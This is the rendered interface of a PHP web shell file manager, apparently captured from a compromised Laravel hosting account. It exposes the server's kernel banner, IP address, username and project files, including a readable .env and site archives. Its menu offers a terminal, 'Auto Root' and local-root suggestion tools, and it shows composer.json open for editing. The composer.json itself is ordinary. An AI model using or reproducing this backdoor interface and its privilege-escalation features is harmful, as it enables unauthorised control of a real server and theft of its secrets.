Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.217.64
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
pilasate /
pilasa-core /
Delete
Unzip
Name
Size
Permission
Date
Action
PilasaWebsite
[ DIR ]
drwxr-xr-x
2026-07-12 20:32
app
[ DIR ]
drwxr-xr-x
2026-07-12 20:33
bestpro
[ DIR ]
drwxr-xr-x
2026-07-12 20:33
bootstrap
[ DIR ]
drwxr-xr-x
2026-07-12 20:32
config
[ DIR ]
drwxr-xr-x
2026-07-12 20:32
database
[ DIR ]
drwxr-xr-x
2026-07-12 20:32
db
[ DIR ]
drwxr-xr-x
2026-07-12 20:32
resources
[ DIR ]
drwxr-xr-x
2026-07-12 20:32
routes
[ DIR ]
drwxr-xr-x
2026-07-12 20:31
storage
[ DIR ]
drwxrwxr-x
2026-07-12 20:31
tests
[ DIR ]
drwxr-xr-x
2026-07-12 20:31
vendor
[ DIR ]
drwxr-xr-x
2026-07-12 20:31
.env
644
B
-rw-r--r--
2024-08-17 05:35
.env.example
521
B
-rw-r--r--
2017-09-10 09:14
.htaccess
197
B
-r--r--r--
2026-06-01 03:28
PilasaWebsite.zip
34.58
MB
-rw-r--r--
2024-07-25 10:23
artisan
1.61
KB
-rw-r--r--
2017-07-11 04:08
composer.json
1.84
KB
-rw-r--r--
2024-07-17 14:07
composer.lock
382.72
KB
-rw-r--r--
2024-07-17 14:07
package.json
1.04
KB
-rw-r--r--
2017-07-11 04:08
phpunit.xml
1.03
KB
-rw-r--r--
2017-07-11 04:08
readme.md
3.34
KB
-rw-r--r--
2017-07-11 04:08
server.php
652
B
-rw-r--r--
2024-08-17 05:20
storage.zip
852.57
KB
-rw-r--r--
2024-07-25 11:13
webpack.mix.js
555
B
-rw-r--r--
2017-07-11 04:08
Save
Rename
{ "name": "laravel/laravel", "description": "The Laravel Framework.", "keywords": ["framework", "laravel"], "license": "MIT", "type": "project", "require": { "php": ">=8.2.0", "barryvdh/laravel-dompdf": "^2.2.0", "intervention/image": "^3.7.2", "jimmyjs/laravel-report-generator": "^2.2.0", "doctrine/dbal": "*", "guzzlehttp/guzzle": "^7.2", "laravel/framework": "^9.19", "illuminate/support": "^9.0", "laravel/passport": "^11.8", "laravel/sanctum": "^3.3.0", "laravel/tinker": "^2.7", "maatwebsite/excel": "^3.1.55", "laravelcollective/html": "6.4.1", "mews/purifier": "^3.4.2" }, "require-dev": { "fakerphp/faker": "^1.9.1", "laravel/pint": "^1.0", "laravel/sail": "^1.0.1", "mockery/mockery": "^1.4.4", "nunomaduro/collision": "^6.1", "phpunit/phpunit": "^9.5.10", "spatie/laravel-ignition": "^1.0" }, "autoload": { "classmap": [ "database" ], "psr-4": { "App\\": "app/" } }, "autoload-dev": { "psr-4": { "Tests\\": "tests/" } }, "scripts": { "post-root-package-install": [ "php -r \"file_exists('.env') || copy('.env.example', '.env');\"" ], "post-create-project-cmd": [ "php artisan key:generate" ], "post-install-cmd": [ "Illuminate\\Foundation\\ComposerScripts::postInstall", "php artisan optimize" ], "post-update-cmd": [ "Illuminate\\Foundation\\ComposerScripts::postUpdate", "php artisan optimize" ] }, "config": { "preferred-install": "dist", "sort-packages": true, "optimize-autoloader": true } }